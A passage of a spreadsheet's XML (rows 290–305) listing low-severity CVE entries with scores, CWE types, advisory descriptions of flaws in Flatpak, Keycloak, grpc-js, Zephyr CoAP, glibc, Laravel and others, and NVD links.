      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-378</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Flatpak creates temporary child repository directories under the user cache with world-writable permissions (0777). On multi-user systems with a permissive umask, other local users could read or modify the temporary directory used while installing apps or runtimes, potentially causing installation failures (denial of service); tampered content would fail signature/digest verification rather than being trusted.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97026</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101333</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>keycloak, requests, gin</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Micrometer user-event metrics listener of Keycloak, a solution for integrated identity and access management. The issue occurs when the listener is configured to include the idp tag. An unauthenticated attacker can send requests to the identity broker login endpoint using arbitrary provider aliases, causing the system to create an unlimited number of metric time series. This can lead to excessive memory consumption and degrade the performance of both the server and its monitoring tools.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101333</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-550</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, when an application method handler throws an uncaught error, the server includes its error message in the status message sent to the client. The thrown error message is transmitted to the client, causing sensitive information disclosure when the message contains sensitive data. This issue is fixed in versions 1.13.6 and 1.14.5.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102363</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains a missing authentication vulnerability in the DeliveryController checkDelivery endpoint that allows unauthenticated attackers to read shipment tracking information by supplying an order number parameter. Attackers can access carrier names, waybill numbers, and complete logistics trails for any order without authentication or ownership verification.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102363</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18416</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>The CoAP link-format helper match_path_uri() in subsys/net/lib/coap/coap_link_format.c compares a registered resource path against the URI carried in a Uri-Query href= option. That URI is not NUL terminated, but the inner character loop advanced its index k once per path character without ever testing it against the option length len. When a registered path segment is longer than the supplied URI and the URI is a prefix of it, the loop reads uri[len] and beyond, past the end of the option value.
The path is reached from coap_well_known_core_get_len() and coap_well_known_core_get() via match_queries_resource(), i.e. by any unauthenticated GET /.well-known/core?href=/&lt;prefix&gt; request to a device that serves /.well-known/core (for the CoAP server subsystem, CONFIG_COAP_SERVER_WELL_KNOWN_CORE, default y) and has at least one resource that declares struct coap_core_metadata attributes.
The over-read does not reach the receive buffer. The well-known-core builders parse the query into a stack-local struct coap_option, whose value is a fixed array (value[12], or CONFIG_COAP_EXTENDED_OPTIONS_LEN_VALUE bytes) that the option bytes are copied into, so uri points into that copy. Reading past len therefore reads the unused, uninitialized tail of the array and, when the option fills it, the bytes just past it in the same stack frame. (In the ZoAP library of v1.8.0 to v1.9.x the option value was instead a pointer into the received packet, and the over-read ran past the option inside the packet buffer.)
The impact is bounded. The number of bytes read past the end is limited by the length of the resource path segment, and each additional byte is only read if it happens to equal the next path character, so in practice the over-read is one byte. It also cannot influence the response: returning a match requires the final compared index to be len - 1 or len, both in bounds, so out-of-bounds bytes only ever steer the loop to the next candidate resource. The consequence is undefined behaviour, not information disclosure and not a matching error.
The fix adds a k &gt;= len guard at the top of the inner loop, so every uri[k] dereference is within the option value while still allowing a trailing * wildcard to match a longer path.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18416</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97399</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>3ff69d7a-14f2-4f67-a097-88dee7810d18</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>The strncasecmp function in the GNU C Library 2.24 and later optimized for the Power8 architecture may read one byte beyond the input size limit, which may crash a program when that byte is not readable.
This condition may happen when the input strings to the strncasecmp function are attacker controlled in an application and they match all the way up to the edge of their page and the neighbouring page is either not mapped or is not readable.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97399</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97027</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>3.6</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Flatpak passes through arbitrary vendor-extension keys unmodified when exporting an application's Desktop Entry (.desktop) and D-Bus Service (.service) files, instead of validating against an allowlist. A malicious Flatpak app can use this to cause denial of service (e.g. forced application restart loops) or to influence host D-Bus/systemd activation behavior beyond what the sandbox is intended to permit.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97027</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101141</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Eleveo Call Recording Software 9.7.0. Affected is an unknown function of the file /callrec/audio.jsp of the component Play Audio Page. Executing a manipulation of the argument viewRoleId/cfType can lead to cross site scripting. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101141</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102264</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in mwasikz robo-cafe-rms up to 228c44a02823f04e85db32b7137809a2856148fc. The impacted element is an unknown function of the file frontend/update-account.php of the component Edit Profile Feature. Performing a manipulation of the argument Name/Address/City results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102264</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102290</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in CodeCanyon Rocket LMS up to 2.2. This affects an unknown function of the component Student Profile Image Upload. Executing a manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102290</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101131</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-807</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in deepseek-ai deepseek-harness up to 0.1.5-rc.3. Impacted is an unknown function of the file packages/e2b/e2b/src/index.ts of the component dsh. The manipulation of the argument E2B_API_KEY leads to reliance on untrusted inputs in a security decision. Local access is required to approach this attack. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101131</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97025</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>3.2</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-378</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Flatpak writes the OCI repository authentication token with world-readable permissions (0644) in the system-helper's cache directory, allowing other local users on a multi-user system to read the token and impersonate the authenticated user against the OCI repository. Only OCI-based sources (e.g. as used by Fedora) are affected; libostree-based sources such as Flathub are not.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97025</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101132</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in DeepSeek deepseek-harness up to 0.1.7-rc.2. The affected element is the function loadProfile of the file packages/boot/app-boot/src/profile.ts of the component Bundle Patch Handler. The manipulation of the argument dsh.bundle.patch results in path traversal. The attack may be performed from remote. The attack requires a high level of complexity. The exploitability is described as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101132</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101265</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-540</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Intelbras TIP 125i 4.3.35/4.3.41. The affected element is an unknown function of the component Básico Page. Such manipulation leads to inclusion of sensitive information in source code. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is described as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101265</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102279</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Laravel is a web application framework. Prior to 12.69.0 and 13.30.0, Laravel exception debug pages with APP_DEBUG=true pass attacker-controlled input to a Tippy.js tooltip configured with allowHTML true, enabling DOM-based cross-site scripting when a user hovers over the tooltip. This issue is fixed in versions 12.69.0 and 13.30.0.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102279</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101079</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>2.8</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-807</t>
